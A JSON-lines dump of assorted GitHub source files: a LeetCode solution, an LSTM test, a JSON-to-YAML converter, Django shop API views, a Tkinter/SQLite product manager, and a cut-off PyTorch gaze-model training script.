longestCommonPrefix(self, strs: List[str]) -> str:\n if len(strs) == 0:\n return \"\"\n table = {}\n prefix = strs[0]\n for s in strs[1:]:\n while (s.find(prefix) !=0):\n prefix = prefix[:len(prefix)-1]\n if prefix == \"\":\n return \"\"\n return prefix","repo_name":"finderkiller/LeetCode","sub_path":"14LongestCommonPrefix.py","file_name":"14LongestCommonPrefix.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29448361900","text":"import numpy as np\n\nfrom culstm import LstmInput, LstmOutput, LstmNetwork, LstmConfig, LstmNode\nimport culstm\n\ndef example_0():\n # parameters for input data dimension and lstm cell count \n hiddenSize = 32\n inputSize = 32\n numLayers = 4\n seqLength = 20\n miniBatch = 64\n lstm_input = LstmInput(inputSize, seqLength)\n for e in range(miniBatch):\n lstm_input.add([[0.2 for x in range(inputSize)] for x in range(seqLength)])\n lstm_output = LstmOutput(hiddenSize, seqLength)\n for e in range(miniBatch):\n lstm_output.add([[1 for x in range(1)] for x in range(seqLength)])\n\n lstm_config = LstmConfig(inputSize, hiddenSize, numLayers, seqLength, miniBatch, loss_func = culstm.square)\n lstm_node = LstmNode(gates = culstm.vanilla, Peepholes=False)\n lstm_net = LstmNetwork(lstm_config, lstm_node)\n lstm_net.run(lstm_input, lstm_output)\n lstm_net.clean()\n\nif __name__ == \"__main__\":\n example_0()\n\n","repo_name":"yuangliu/15618prj","sub_path":"culstm/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"32537732691","text":"# -*- coding: utf-8 -*-\n\"\"\"\njson to yaml converter\n\"\"\"\n\nimport json\nimport yaml\n\nclass ConvertJsonToYaml:\n @staticmethod\n def run(deserializeddata, yamlfilelocation):\n print(\"\\nlet's convert something...\")\n with open(yamlfilelocation, 'w', encoding='utf8') as outgoingfile:\n yaml.dump(deserializeddata, outgoingfile, allow_unicode=True)\n print(\"conversion is done!\")\n\n @staticmethod\n def run(jsonfilelocation, yamlfilelocation):\n print(\"\\nlet's convert something...\")\n with open(jsonfilelocation, 'r', encoding='utf8') as incomingfile:\n deserializeddata = json.load(incomingfile)\n with open(yamlfilelocation, 'w', encoding='utf8') as outgoingfile:\n yaml.dump(deserializeddata, outgoingfile, allow_unicode=True)\n print(\"conversion is done!\")\n","repo_name":"makspervov/Integracja-systemow","sub_path":"lab2/Python (Zad 2.2-2.6, 2.8)/convert_json_to_yaml.py","file_name":"convert_json_to_yaml.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8408583324","text":"from django.contrib.auth import get_user_model\n\nfrom rest_framework import viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\n\nfrom .models import Produto, Pedido, ItemPedido, Endereco\nfrom .serializers import *\nfrom .utils import gerar_id\n\n\nUser = get_user_model()\n\n\nclass ProdutoViewset(viewsets.ReadOnlyModelViewSet):\n queryset = Produto.objects.filter(listado=True)\n serializer_class = ProdutoSerializer\n\n def get_queryset(self):\n # garantir que o queryset será reavaliado em cada solicitação (self.queryset fica em cache)\n queryset = super().get_queryset()\n\n if self.request.query_params:\n # colocar as ordenações no formato de URL Params (ex: ?ordem=nome)\n query_params = self.request.query_params\n if 'ordem' in query_params:\n campo_ordem = query_params.get('ordem')\n return queryset.order_by(campo_ordem)\n\n if 'slug' in query_params:\n queryset = queryset.filter(slug=query_params.get('slug'))\n\n return queryset\n\n @action(detail=True, methods=['post'])\n def adicionar_ao_carrinho(self, request, pk=None):\n cliente_atual = request.user\n produto_atual = self.get_object()\n\n pedido_atual, criado = Pedido.objects.get_or_create(\n cliente=cliente_atual,\n status='carrinho',\n #defaults={'id_pedido': gerar_id(12)},\n )\n\n produto_comprado = ItemPedido.objects.create(\n produto=produto_atual,\n pedido=pedido_atual,\n quantidade=int(request.data.get('quantidade'))\n )\n\n pedido_atual.quantidade += produto_comprado.quantidade\n # dez reais de frete para cada produto no pedido\n # pedido_atual.frete = 10 * pedido_atual.quantidade\n pedido_atual.subtotal += produto_atual.preco * produto_comprado.quantidade\n pedido_atual.save()\n\n pedido_serializer = PedidoSerializer(pedido_atual)\n\n return Response(data=pedido_serializer.data, status=status.HTTP_201_CREATED)\n\n\nclass EnderecoViewset(viewsets.ModelViewSet):\n permission_classes = [IsAuthenticated]\n queryset = Endereco.objects.all()\n serializer_class = EnderecoSerializer\n\n def list(self, request):\n cliente = request.user\n queryset = Endereco.objects.filter(cliente=cliente)\n serializer = EnderecoSerializer(queryset, many=True)\n\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n def create(self, request):\n cliente = request.user\n dados_endereco = {'cliente': cliente.pk, **request.data}\n serializer = self.get_serializer(data=dados_endereco)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\n\nclass PedidoViewset(viewsets.ModelViewSet):\n permission_classes = [IsAuthenticated]\n queryset = Pedido.objects.all()\n\n def list(self, request):\n cliente = request.user\n queryset = Pedido.objects.filter(cliente=cliente)\n serializer = PedidoSerializer(queryset, many=True)\n\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=True, methods=['get'])\n def ver_itens(self, request, pk=None):\n # endpoint para verificar todos os produtos de um pedido específico\n pedido_atual = self.get_object()\n itens_pedido = ItemPedido.objects.filter(pedido=pedido_atual)\n serializer = ItemPedidoSerializer(itens_pedido, many=True)\n\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['get'])\n def carrinho(self, request):\n # endpoint para verificar os itens do carrinho\n cliente_atual = request.user\n carrinho = ItemPedido.objects.filter(\n pedido__cliente=cliente_atual, pedido__status='carrinho')\n serializer = ItemPedidoSerializer(carrinho, many=True)\n\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=False, methods=['post'])\n def checkout(self, request):\n '''\n Fazer checkout de um pedido:\n Validar endereço do usuário, verificar saldo e estoque, deduzir saldo\n deduzir estoque dos produtos\n '''\n cliente_atual = request.user\n id_endereco = int(request.data.get('endereco'))\n carrinho = Pedido.objects.get(cliente=cliente_atual, status='carrinho')\n itens_carrinho = ItemPedido.objects.filter(pedido=carrinho)\n\n # verificações de saldo e endereço do cliente\n endereco = Endereco.objects.get(id=id_endereco)\n\n if (endereco.cliente != cliente_atual):\n return Response({'erro': 'O endereço enviado não pertence a você.'}, status=status.HTTP_400_BAD_REQUEST)\n elif (cliente_atual.saldo < carrinho.total):\n return Response({'erro': 'Saldo insuficiente.'}, status=status.HTTP_400_BAD_REQUEST)\n\n # verificação de estoque dos produtos\n for item_comprado in itens_carrinho:\n produto = item_comprado.produto\n if produto.estoque < item_comprado.quantidade:\n return Response({'erro': f'Produto {produto.nome} fora de estoque.'}, status=status.HTTP_400_BAD_REQUEST)\n\n # dedução dos produtos em estoque\n for item_comprado in itens_carrinho:\n produto = item_comprado.produto\n produto.estoque -= item_comprado.quantidade\n\n produto.save()\n\n # dedução do saldo do cliente\n cliente_atual.saldo -= carrinho.total\n cliente_atual.save()\n\n # alteração do status do pedido para pagamento aprovado\n carrinho.status = 'aprovado'\n carrinho.save()\n\n return Response({'mensagem': 'Transação concluída.'}, status=status.HTTP_200_OK)\n\n\nclass ItemPedidoViewset(viewsets.ModelViewSet):\n permission_classes = [IsAuthenticated]\n queryset = ItemPedido.objects.all()\n\n def destroy(self, request, pk=None):\n # atualizar pedidos ao remover itens do carrinho\n item_atual = self.get_object()\n pedido = item_atual.pedido\n produto = item_atual.produto\n\n if pedido.status != 'carrinho':\n return Response({'erro': 'Itens de pedidos fechados não podem ser apagados'}, status=status.HTTP_400_BAD_REQUEST)\n\n # atualizar o status do pedido atual\n pedido.subtotal -= produto.preco * item_atual.quantidade\n pedido.frete = 10 * pedido.quantidade\n pedido.save()\n\n super().destroy(request, pk)\n","repo_name":"and3rcg/ps-supera-backend","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4661526308","text":"#Importando librerias\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nimport sqlite3\nfrom nltk import tree\n\n\n#Desarrollo del GUI\n\nroot = Tk()\nroot.title('Ferreteria El Tornillo Feliz')\nroot.geometry(\"620x350\")\n\nid = StringVar()\ncodproduct = StringVar()\ndescription= StringVar()\nprice = StringVar()\ntotal = StringVar()\n\ndef conection_bd():\n conection=sqlite3.connect('base')\n cursor=conection.cursor()\n try:\n cursor.execute('''\n CREATE TABLE product(\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n CODPRODUCT VARCHAR(10) NOT NULL,\n DESCRIPTION VARCHAR(100) NOT NULL,\n PRICE FLOAT NOT NULL,\n TOTAL FLOAT NOT NULL)\n ''')\n\n messagebox.showinfo(\"CONEXION\", \"Base de datos creada exitosamente\")\n except:\n messagebox.showinfo(\"CONEXION\", \"Conexión exitosa con la base de datos\")\n\ndef delete_bd():\n conection=sqlite3.connect('base')\n cursor=conection.cursor()\n if messagebox.askyesno(message='Los datos se perderán, desea continuar', title= 'Advertencia'):\n cursor.execute('DROP TABLE product')\n else:\n pass\n\n\ndef end_app():\n valor= messagebox.askquestion('Salir', '¿está seguro que desea salir de la aplicación?')\n if valor == \"yes\":\n root.destroy()\n\ndef clean_fields():\n codproduct.set(\"\")\n description.set(\"\")\n price.set(\"\")\n total.set(\"\")\n\ndef message():\n about= '''\n Aplicación de Escritorio\n Tecnology Python Tkinter\n '''\n messagebox.showinfo(title='Información', message=about)\n## Metodos CRUD\n\ndef create():\n conection=sqlite3.connect('base')\n cursor=conection.cursor()\n try:\n data= codproduct.get(), description.get(), price.get(), total.get()\n cursor.execute('INSERT INTO product VALUES(NULL,?,?,?,?)', (data))\n conection.commit()\n except:\n messagebox.showwarning('Advertencia', 'Ocurrió un error al crear el registro, verifique la conexión con la base de datos')\n pass\n clean_fields()\n show()\n\ndef show():\n conection=sqlite3.connect('base')\n cursor=conection.cursor()\n register = tree.get_children()\n for element in register:\n tree.delete(element)\n\n try:\n cursor.execute('SELECT * FROM product')\n for row in cursor:\n tree.insert('',0,text=row[0], values= (row[1], row[2], row[3], row[4]))\n except:\n pass\n\n## Table\n\ntree = ttk.Treeview(height=10, columns = ('#0', '#1', '#2', '#3'))\ntree.place (x=0, y=130)\ntree.column('#0', width=50)\ntree.heading('#0', text='Id', anchor= CENTER)\ntree.heading('#1', text='Código Producto', anchor= CENTER)\ntree.column('#1', width=100)\ntree.heading('#2', text='Descripción', anchor= CENTER)\ntree.column('#2', width=230)\ntree.heading('#3', text='Precio', anchor= CENTER)\ntree.column('#3', width=100)\ntree.heading('#4', text='Total', anchor= CENTER)\ntree.column('#4', width=150)\n\ndef select_on_click(event):\n item= tree.identify('item', event.x, event.y)\n id.set(tree.item(item,'text'))\n codproduct.set(tree.item(item,'values')[0])\n description.set(tree.item(item,'values')[1])\n price.set(tree.item(item,'values')[2])\n total.set(tree.item(item,'values')[3])\n\ntree.bind('', select_on_click)\n\n\ndef update():\n conection=sqlite3.connect('base')\n cursor=conection.cursor()\n try:\n data = codproduct.get(), description.get(), price.get(), total.get()\n cursor.execute('UPDATE user SET CODPRODUCT=?, DESCRIPTION=?, PRICE=?, TOTAL=? WHERE ID='+ id.get(), (data))\n conection.commit()\n except:\n messagebox.showwarning('Advertencia', 'Ocurrio un error al actualizar el registro')\n pass\n clean_fields()\n show()\n\ndef delete():\n conection=sqlite3.connect('base')\n cursor=conection.cursor()\n try:\n if messagebox.askyesno(message='¿Quiere eliminar el registros?', title='Advertencia'):\n cursor.execute('DELETE FROM product WHERE ID='+ id.get())\n conection.commit()\n except:\n messagebox.showwarning('Advertencia','Ocurrio un error al tratar de eliminar el registro')\n pass\n clean_fields()\n show()\n\n## Colocar widgets en la VISTA\n\n# Menú\nmenubar= Menu(root)\nmenubasedat = Menu(menubar,tearoff=0)\nmenubasedat.add_command(label='Crear/Conectar Base de Datos', command=conection_bd)\nmenubasedat.add_command(label='Eliminar Base de Datos', command=delete_bd)\nmenubasedat.add_command(label='Salir', command=exit)\nmenubar.add_cascade(label='Inicio', menu=menubasedat)\n\nhelp=Menu(menubar, tearoff=0)\nhelp.add_command(label='Limpiar campos', command=clean_fields)\nhelp.add_command(label= 'Acerca', command= message)\nmenubar.add_cascade(label='Ayuda', menu=help)\n\n# Etiqueta y caja de texto\n\ne1 = Entry(root, textvariable= id)\n\nl2 = Label(root, text= 'Código :')\nl2.place(x=50, y=10)\ne2 = Entry(root, textvariable=codproduct, width=20)\ne2.place(x=100, y=10)\n\nl3= Label(root, text= 'Descripción :')\nl3.place(x=50, y=40)\ne3 = Entry(root, textvariable=description, width=50)\ne3.place(x=125, y=40)\n\n\nl5 = Label(root, text= 'Precio :')\nl5.place(x=50, y=70)\ne5 = Entry(root, textvariable=price, width=10)\ne5.place(x=95, y=70)\n\n\nl2 = Label(root, text= 'Total :')\nl2.place(x=50, y=100)\ne2 = Entry(root, textvariable=total, width=10)\ne2.place(x=90, y=100)\n\n\n# Botones\n\nb1=Button(root, text='Registrar', command=create)\nb1.place(x=360, y=90)\n\nb2=Button(root, text='Mostrar Lista', bg= 'grey', command=show)\nb2.place(x=500, y=90)\n\n\nb3=Button(root, text='Eliminar', bg= 'red', command=delete)\nb3.place(x=430, y=90)\n\n\n\nroot.config(menu=menubar)\n\nroot.mainloop()","repo_name":"SuperGandhi/Desktop-application-Tkinter","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7165746984","text":"import numpy as np\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom tqdm import tqdm\nfrom gazesim.training.config import parse_config\nfrom gazesim.training.utils import get_batch_size, to_device, load_model\nfrom gazesim.training.helpers import resolve_model_class, resolve_dataset_class, resolve_optimiser_class\nfrom gazesim.training.helpers import resolve_losses, resolve_output_processing_func, resolve_logger_class\nfrom gazesim.data.utils import pair\n\n\ndef train(config, device):\n # generators\n training_set = resolve_dataset_class(config[\"dataset_name\"])(config, split=\"train\")\n training_generator = DataLoader(training_set, batch_size=config[\"batch_size\"],\n shuffle=True, num_workers=config[\"num_workers\"])\n\n validation_set = resolve_dataset_class(config[\"dataset_name\"])(config, split=\"val\")\n validation_generator = DataLoader(validation_set, batch_size=config[\"batch_size\"],\n shuffle=False, num_workers=config[\"num_workers\"])\n\n # define the model\n model_class = resolve_model_class(config[\"model_name\"])\n model = model_class(config)\n if config[\"model_info\"] is not None:\n # TODO: need to update this to work with models where we want to partially load them\n # => might be good to have a method for models like that which can be called\n model.load_state_dict(config[\"model_info\"][\"model_state_dict\"])\n model = model.to(device)\n\n # define the optimiser\n optimiser = resolve_optimiser_class(config[\"optimiser\"])(model.parameters(), lr=config[\"learning_rate\"])\n if config[\"model_info\"] is not None:\n optimiser.load_state_dict(config[\"model_info\"][\"optimiser_state_dict\"])\n\n # define the loss function(s)\n loss_functions = resolve_losses(config[\"losses\"])\n\n # define the logger\n logger = resolve_logger_class(config[\"dataset_name\"], config[\"mode\"])(config)\n logger.update_info(model=model, dataset=training_set)\n\n # prepare for doing pass over validation data args.validation_frequency times each epoch\n validation_check = np.linspace(0, len(training_set), config[\"validation_frequency\"] + 1)\n validation_check = np.round(validation_check).astype(int)\n validation_check = validation_check[1:]\n\n # loop over epochs\n global_step = 0 if config[\"model_info\"] is None else config[\"model_info\"][\"global_step\"]\n for epoch in range(0 if config[\"model_info\"] is None else config[\"model_info\"][\"epoch\"] + 1, config[\"num_epochs\"]):\n print(\"Starting epoch {:03d}!\".format(epoch))\n model.train()\n validation_current = 0\n\n for batch_index, batch in tqdm(enumerate(training_generator), total=len(training_generator)):\n # transfer to GPU\n batch = to_device(batch, device)\n\n # forward pass, loss computation and backward pass\n optimiser.zero_grad()\n predictions = model(batch)\n total_loss = None\n partial_losses = {}\n for output in predictions:\n if isinstance(predictions[output], dict):\n # this is very ugly, but for now it should work for the multi-scale attention model\n partial_losses[output] = {}\n for partial_output in predictions[output]:\n current_prediction = resolve_output_processing_func(\n output, config[\"losses\"][output])(predictions[output][partial_output])\n current_loss = loss_functions[output](current_prediction, batch[output])\n if total_loss is None:\n total_loss = current_loss\n else:\n total_loss += current_loss\n partial_losses[output][partial_output] = current_loss\n else:\n current_prediction = resolve_output_processing_func(\n output, config[\"losses\"][output])(predictions[output])\n current_loss = loss_functions[output](current_prediction, batch[output])\n if total_loss is None:\n total_loss = current_loss\n else:\n total_loss += current_loss\n partial_losses[output] = current_loss\n total_loss.backward()\n optimiser.step()\n\n with torch.no_grad():\n # global_step += batch[sorted(batch.keys())[0]].shape[0]\n global_step += get_batch_size(batch)\n\n # log at the end of each training step (each batch)\n # scalar_loss = loss.item()\n logger.training_step_end(global_step, total_loss, partial_losses, batch, predictions)\n\n # do validation if it should be done\n if (global_step - epoch * len(training_set)) >= validation_check[validation_current]:\n disable = True\n if config[\"validation_frequency\"] == 1:\n print(\"Validation for epoch {:03d}!\".format(epoch))\n disable = False\n\n model.eval()\n for val_batch_index, val_batch in tqdm(enumerate(validation_generator), disable=disable, total=len(validation_generator)):\n # transfer to GPU\n val_batch = to_device(val_batch, device)\n\n # forward pass and loss computation\n val_predictions = model(val_batch)\n total_val_loss = None\n partial_val_losses = {}\n for output in val_predictions:\n if isinstance(val_predictions[output], dict):\n # this is very ugly, but for now it should work for the multi-scale attention model\n partial_val_losses[output] = {}\n for partial_output in val_predictions[output]:\n current_prediction = resolve_output_processing_func(\n output, config[\"losses\"][output])(val_predictions[output][partial_output])\n current_loss = loss_functions[output](current_prediction, val_batch[output])\n if total_val_loss is None:\n total_val_loss = current_loss\n else:\n total_val_loss += current_loss\n partial_val_losses[output] = current_loss\n else:\n current_prediction = resolve_output_processing_func(\n output, config[\"losses\"][output])(val_predictions[output])\n current_loss = loss_functions[output](current_prediction, val_batch[output])\n if total_val_loss is None:\n total_val_loss = current_loss\n else:\n total_val_loss += current_loss\n partial_val_losses[output] = current_loss\n\n # tracking the loss in the logger\n # val_scalar_loss = val_loss.item()\n logger.validation_step_end(global_step, total_val_loss, partial_val_losses, val_batch, val_predictions)\n\n # log after the complete pass over the validation set\n logger.validation_epoch_end(global_step, epoch, model, optimiser)\n\n # update index for checking whether we should run validation loop\n validation_current += 1\n model.train()\n\n # log at the end of the epoch\n logger.training_epoch_end(global_step, epoch, model, optimiser)\n\n\ndef cross_validate(config, device):\n # TODO: what should the CV logger log?\n # - should the different CV runs be subdirectories or should they be stored as different scalars/variables?\n # => maybe these should just be entirely different, e.g. \"cv/loss/...\"\n # - do we even want to log e.g. training loss with cross validation?\n # => probably should, just to see if everything's progressing\n # - how should the final output of the cross-validation be saved?\n\n # define the classes here (could also be done in main...)\n dataset_class = resolve_dataset_class(config[\"dataset_name\"])\n model_class = resolve_model_class(config[\"model_name\"])\n optimiser_class = resolve_optimiser_class(config[\"optimiser\"])\n\n # define the loss function(s)\n loss_functions = resolve_losses(config[\"losses\"])\n\n # define the logger\n logger = resolve_logger_class(config[\"dataset_name\"], config[\"mode\"])(config)\n\n for cv_split in range(config[\"cv_splits\"]):\n print(\"Starting split {:02d}!\".format(cv_split))\n\n # generators\n training_set = dataset_class(config, split=\"train\", cv_split=cv_split)\n training_generator = DataLoader(training_set, batch_size=config[\"batch_size\"],\n shuffle=True, num_workers=config[\"num_workers\"])\n\n validation_set = dataset_class(config, split=\"test\", cv_split=cv_split)\n validation_generator = DataLoader(validation_set, batch_size=config[\"batch_size\"],\n shuffle=False, num_workers=config[\"num_workers\"])\n\n # define the model, no loading functionality here for now, would only make sense with something\n # like dreyeve and then it would probably take way to long to train for cross validation\n model = model_class(config)\n model = model.to(device)\n\n # update logger\n logger.update_info(model=model, dataset=training_set, split=cv_split)\n\n # define the optimiser, no loading same as for models\n optimiser = optimiser_class(model.parameters(), lr=config[\"learning_rate\"])\n\n # prepare for doing pass over validation data args.validation_frequency times each epoch\n validation_check = np.linspace(0, len(training_set), config[\"validation_frequency\"] + 1)\n validation_check = np.round(validation_check).astype(int)\n validation_check = validation_check[1:]\n\n # loop over epochs\n global_step = 0\n for epoch in range(config[\"num_epochs\"]):\n print(\"Starting epoch {:03d}!\".format(epoch))\n validation_current = 0\n\n model.train()\n for batch_index, batch in tqdm(enumerate(training_generator), total=len(training_generator)):\n # transfer to GPU\n batch = to_device(batch, device)\n\n # forward pass, loss computation and backward pass\n optimiser.zero_grad()\n predictions = model(batch)\n total_loss = None\n partial_losses = {}\n for output in predictions:\n current_prediction = resolve_output_processing_func(output)(predictions[output])\n current_loss = loss_functions[output](current_prediction, batch[output])\n if total_loss is None:\n total_loss = current_loss\n else:\n total_loss += current_loss\n partial_losses[output] = total_loss\n total_loss.backward()\n optimiser.step()\n\n with torch.no_grad():\n global_step += get_batch_size(batch)\n\n # log at the end of each training step (each batch)\n logger.training_step_end(global_step, total_loss, partial_losses, batch, predictions)\n\n # do validation if it should be done\n if (global_step - epoch * len(training_set)) >= validation_check[validation_current]:\n disable = True\n if config[\"validation_frequency\"] == 1:\n print(\"Validation for epoch {:03d}!\".format(epoch))\n disable = False\n\n model.eval()\n for val_batch_index, val_batch in tqdm(enumerate(validation_generator), disable=disable,\n total=len(validation_generator)):\n # transfer to GPU\n val_batch = to_device(val_batch, device)\n\n # forward pass and loss computation\n val_predictions = model(val_batch)\n total_val_loss = None\n partial_val_losses = {}\n for output in val_predictions:\n current_prediction = resolve_output_processing_func(output)(val_predictions[output])\n current_loss = loss_functions[output](current_prediction, val_batch[output])\n if total_val_loss is None:\n total_val_loss = current_loss\n else:\n total_val_loss += current_loss\n partial_val_losses[output] = current_loss\n\n # tracking the loss in the logger\n # TODO: should probably also just record the validation error(s) for the\n # different splits in the logger and then save them in the logger as well\n logger.validation_step_end(global_step, total_val_loss, partial_val_losses, val_batch,\n val_predictions)\n\n # log after the complete pass over the validation set\n logger.validation_epoch_end(global_step, epoch, model, optimiser)\n\n # update index for checking whether we should run validation loop\n validation_current += 1\n model.train()\n\n # log at the end of the epoch\n logger.training_epoch_end(global_step, epoch, model, optimiser)\n\n with torch.no_grad():\n model.eval()\n for train_batch_index, train_batch in tqdm(enumerate(training_generator), disable=disable,\n total=len(training_generator)):\n # transfer to GPU\n train_batch = to_device(train_batch, device)\n\n # forward pass and loss computation\n train_predictions = model(train_batch)\n total_train_loss = None\n partial_train_losses = {}\n for output in train_predictions:\n current_prediction = resolve_output_processing_func(output)(train_predictions[output])\n current_loss = loss_functions[output](current_prediction, train_batch[output])\n if total_train_loss is None:\n total_train_loss = current_loss\n else:\n total_train_loss += current_loss\n partial_train_losses[output] = current_loss\n\n # tracking the loss in the logger\n logger.final_training_pass_step_end(global_step, total_train_loss, partial_train_losses,\n train_batch, train_predictions)\n\n # log after the complete pass over the training set\n logger.final_training_pass_epoch_end(global_step, epoch, model, optimiser)\n model.train()\n\n\ndef val_or_test(config, device):\n # load the model\n model, model_config = load_model(config[\"model_load_path\"], config[\"gpu\"], return_config=True)\n model.to(device)\n model.eval()\n\n # modify model config for dataset loading\n model_config[\"data_root\"] = config[\"data_root\"]\n model_config[\"split_config\"] = config[\"split_config\"]\n model_config[\"eval_model_load_path\"] = config[\"model_load_path\"]\n\n # define the dataset\n validation_set = resolve_dataset_class(model_config[\"dataset_name\"])(model_config, split=config[\"mode\"])\n validation_generator = DataLoader(validation_set, batch_size=config[\"batch_size\"],\n shuffle=False, num_workers=config[\"num_workers\"])\n\n # define the loss function(s)\n loss_functions = resolve_losses(model_config[\"losses\"])\n\n # define the logger and disable writing to hardware\n logger = resolve_logger_class(model_config[\"dataset_name\"], config[\"mode\"])(model_config, disable_write_to_disk=True)\n logger.update_info(model=model, dataset=validation_set)\n\n print(\"Starting validation!\")\n with torch.no_grad():\n model.eval()\n for val_batch_index, val_batch in tqdm(enumerate(validation_generator), total=len(validation_generator)):\n # transfer to GPU\n val_batch = to_device(val_batch, device)\n\n # forward pass and loss computation\n val_predictions = model(val_batch)\n total_val_loss = None\n partial_val_losses = {}\n for output in val_predictions:\n if isinstance(val_predictions[output], dict):\n # this is very ugly, but for now it should work for the multi-scale attention model\n partial_val_losses[output] = {}\n for partial_output in val_predictions[output]:\n current_prediction = resolve_output_processing_func(\n output, model_config[\"losses\"][output])(val_predictions[output][partial_output])\n current_loss = loss_functions[output](current_prediction, val_batch[output])\n if total_val_loss is None:\n total_val_loss = current_loss\n else:\n total_val_loss += current_loss\n partial_val_losses[output] = current_loss\n else:\n current_prediction = resolve_output_processing_func(\n output, model_config[\"losses\"][output])(val_predictions[output])\n current_loss = loss_functions[output](current_prediction, val_batch[output])\n if total_val_loss is None:\n total_val_loss = current_loss\n else:\n total_val_loss += current_loss\n partial_val_losses[output] = current_loss\n\n # tracking the loss in the logger\n logger.validation_step_end(0, total_val_loss, partial_val_losses, val_batch, val_predictions)\n\n # print out results after complete pass over validation set\n test = logger.total_loss_val / len(validation_generator)\n logger.validation_epoch_end(0, 0, model, None)\n\n print(\"Finished validation!\")\n print(\"Validation loss :\", test.item())\n\n\ndef main(config):\n # set the seed for PyTorch\n torch.manual_seed(config[\"torch_seed\"])\n np.random.seed(config[\"torch_seed\"])\n\n # use GPU if possible\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda:{}\".format(config[\"gpu\"])\n if use_cuda and config[\"gpu\"] < torch.cuda.device_count() else \"cpu\")\n\n # check what to do: at the moment only choice between training and cross validation\n # would be easier to just specify that training/CV should be done rather than checking automatically...\n {\"train\": train, \"cv\": cross_validate, \"val\": val_or_test, \"test\": val_or_test}[config[\"mode\"]](config, device)\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n\n # arguments related to the dataset\n parser.add_argument(\"-r\", \"--data_root\", type=str,\n help=\"The root directory of the dataset (should contain only subfolders for each subject).\")\n parser.add_argument(\"-sc\", \"--split_config\",\n help=\"The split configuration/index to get information about the division into training \"\n \"and validation (and test) data from. Can either be the path to a file or an index \"\n \"(will search in $DATA_ROOT/splits/).\")\n parser.add_argument(\"-fps\", \"--frames_per_second\", type=int,\n help=\"Frame rate of the input videos (needs to be specified \"\n \"since the original indexing is done at 60 FPS).\")\n parser.add_argument(\"-ss\", \"--stack_size\", type=int,\n help=\"Number of frames to stack for models that take multiple \"\n \"frames as input (i.e. C3D, Dr(eye)ve, RNNs)\")\n parser.add_argument(\"-ivn\", \"--input_video_names\", type=str, nargs=\"+\",\n help=\"The (file) name(s) for the video(s) to use as input.\")\n parser.add_argument(\"-dsn\", \"--drone_state_names\", type=str, nargs=\"+\",\n help=\"The column names/quantities to use as input when there is a drone state input. \"\n \"Can also specify the following shorthands for pre-defined sets of columns: \"\n \"'all', 'vel', 'acc', 'ang_vel'.\")\n parser.add_argument(\"-agt\", \"--attention_ground_truth\", type=str,\n help=\"The (file) name(s) for the video(s) to use as targets for attention.\")\n parser.add_argument(\"-cgt\", \"--control_ground_truth\", type=str,\n help=\"The (file) name(s) for the video(s) to use as targets for attention.\")\n # parser.add_argument(\"-gtn\", \"--ground_truth_name\", type=str, # TODO: remove\n # help=\"The (file) name(s) for the video(s) to use as targets for attention.\")\n parser.add_argument(\"-c\", \"--config_file\", type=str,\n help=\"Config file to load parameters from.\")\n\n # arguments related to data normalisation/standardisation\n parser.add_argument(\"-nn\", \"--no_normalisation\", action=\"store_true\",\n help=\"Whether or not to normalise the image input data.\")\n parser.add_argument(\"-cn\", \"--control_normalisation\", action=\"store_true\",\n help=\"Whether or not to normalise the control input data.\")\n parser.add_argument(\"-cnr\", \"--control_normalisation_range\", type=pair, nargs=\"+\",\n help=\"Ranges of control inputs to use for normalisation (i.e. maximum thrust and body rates).\")\n parser.add_argument(\"-cg\", \"--clip_gaze\", action=\"store_true\",\n help=\"Whether or not to clip gaze GT to [-1, 1] when loading it.\")\n parser.add_argument(\"-sg\", \"--scale_gaze\", action=\"store_true\",\n help=\"Whether or not to scale gaze GT to actual image coordinates (after clipping).\")\n\n # arguments related to (video) data augmentation\n parser.add_argument(\"-vda\", \"--video_data_augmentation\", action=\"store_true\",\n help=\"Whether or not to apply data augmentation for the image/video input data.\")\n parser.add_argument(\"--vda_probability\", type=float,\n help=\"Probability of applying individual data augmentation transforms.\")\n parser.add_argument(\"--vda_jitter_range\", type=float,\n help=\"Color jitter range for data augmentation.\")\n parser.add_argument(\"--vda_gaussian_noise_sigma\", type=float,\n help=\"Standard deviation for Gaussian noise applied for data augmentation.\")\n parser.add_argument(\"-vrc\", \"--video_random_cropping\", action=\"store_true\",\n help=\"Whether or not to randomly crop image/video input data.\")\n parser.add_argument(\"--vrc_factor_before_crop\", type=float,\n help=\"If random cropping is used, by what factor to \"\n \"resize images/attention maps to before cropping.\")\n\n # arguments related to the DDA input modalities\n parser.add_argument(\"-fts\", \"--feature_track_name\", type=str,\n help=\"The (file) name for already extracted feature tracks for the DDA architecture.\")\n parser.add_argument(\"-ftn\", \"--feature_track_num\", type=int,\n help=\"The number of feature tracks per sample to use in the DDA architecture.\")\n parser.add_argument(\"-rn\", \"--reference_name\", type=str,\n help=\"The (file) name for reference states for the DDA architecture.\")\n parser.add_argument(\"-rv\", \"--reference_variables\", type=str, nargs=\"+\",\n help=\"The column names/state variables to use for the reference statess for the DDA \"\n \"architecture. Can also specify the following shorthands for pre-defined sets of \"\n 